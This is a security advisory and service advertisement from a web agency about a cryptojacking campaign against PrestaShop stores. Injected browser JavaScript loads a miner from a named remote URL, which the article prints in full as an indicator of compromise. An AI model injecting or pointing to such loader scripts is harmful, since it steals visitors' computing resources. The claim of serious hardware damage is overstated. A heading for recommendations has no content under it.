[AVISO MALWARE CRIPTOJACKING EN PRESTASHOP] Massive Malware attack trustisimportant.fun to mine cryptocurrencies from PrestaShop online stores using customers’ CPU/GPU resources
From Liewebs, we have detected that since a few days ago, some cybercriminals are committing massive attacks to PrestaShop online stores that involves the insertion of malicious code (Malware) within the website to perform cryptocurrency mining tasks illegally, also called cryptojacking. This attack makes use of the CPU/GPU resources of the customer’s devices for these cryptocurrency mining tasks through the web browser.
What is this cryptojacking cyber attack on PrestaShop online stores?
During these days, we have received a lot of requests for URGENT Technical Support from customers with PrestaShop stores that have suffered the same type of attack, so we assume that this is a massive action in a short period of time by these cybercriminals.
This cyberattack, compared to other similar ones, is specially designed for the PrestaShop platform, because it looks for specific files that are only found in this type of ecommerce platforms to perform the insertion of Malware or malicious code related to cryptojacking.
The inserted malware is basically code Javascript executed on the client side, i.e. in the web browser. Below is a screenshot of the malicious code fragment:
The purpose of this code is to call the URL https://trustisimportant.fun/karma/karma.js?karma=bs?nosaj=faster.mo from which a much more extensive code is loaded and whose purpose is to perform tasks of cryptocurrency mining using the resources of the computers or devices of the visitors or customers visiting the website at that time. This type of malware is called cryptojacking.
When a customer accesses the infected store, the Malware code is executed in his browser, starting to make use of all the CPU and GPU resources of the computer to perform these mining tasks. The immediate problem the customer is exposed to is that his computer starts to run out of available resources and overheat due to overuse. This could cause serious hardware damage if the browser is not closed in time.
Mining tasks require very powerful equipment with advanced cooling systems.
In fact, the store where the malicious code is located becomes a mere carrier of Malware, without it affecting you directly, except for the penalty you get from the search engines for detecting that the website contains Malware. The benefit obtained by the attacker is to have, in an illicit way, stealing CPU and GPU resources that will offer the computers of everyone who visits the infected website, in order to perform cryptocurrency mining tasks and thus obtain a great profitability and economic benefit. The most curious thing about this type of attack is that the user is completely unaware that his computer is being used to mine cryptocurrencies, he only experiences an increase in the use of his CPU, GPU and, as a consequence, a considerable increase in the temperature of these components.
You can read more information about these malware in the following article Cryptocurrency mining malware.
The good news is that this type of attack is not designed to delete website data or steal sensitive data from online store users, such as credit/debit card details, personal information, etc… In fact, most PrestaShop online store owners have been able to find out about it through online Malware analysis tools such as Sucuri and others.
In the case of Sucuri, we can guarantee that it detects this type of cyber-attacks, so if you are a PrestaShop online store owner, and you don’t know if you could have been infected by this Malware, we recommend you to take the free scan they offer.
If you have been infected by this Malware, at Liewebs we can give you the best web disinfection service to completely neutralize this malicious code. We have a service of web disinfection and technical support 24 hours a day, 365 days a year.
Recommendations to prevent your website or PrestaShop store from being infected by Malware
The fact that your website or online store is visible on the Internet, is exposed to attack by cybercriminals. The probability increases directly proportional to the increase in traffic to the website and its visibility on the Internet.
One of the best recommendations is to have a professional team, as in Liewebs, to perform monthly maintenance tasks. monthly maintenance tasks so that online stores are always protected using strong security policies and minimizing the appearance of vulnerabilities.
Here are our general recommendations for all PrestaShop online store or website owners:
How to disinfect and completely remove this Malware
We have at your disposal a special service to search for and completely remove the codes inserted by this cryptojacking Malware. We restore the normal operation of your store and completely eliminate this threat. The service includes urgent priority.